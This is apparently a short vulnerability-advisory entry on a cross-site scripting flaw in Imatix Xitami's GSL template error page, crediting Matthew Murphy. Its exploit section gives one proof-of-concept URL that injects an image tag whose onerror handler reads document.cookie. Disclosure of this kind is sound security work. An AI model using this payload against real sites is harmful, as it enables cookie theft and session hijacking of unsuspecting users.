• info
• discussion
• exploit
• solution
• references

Imatix Xitami GSL Template Cross Site Scripting Vulnerability

Matthew Murphy <mattmurphy@kc.rr.com> has provided the following exploit information:

http://www.<IMG%20SRC=""%20ONERROR="alert(document.cookie)">.target.com/error404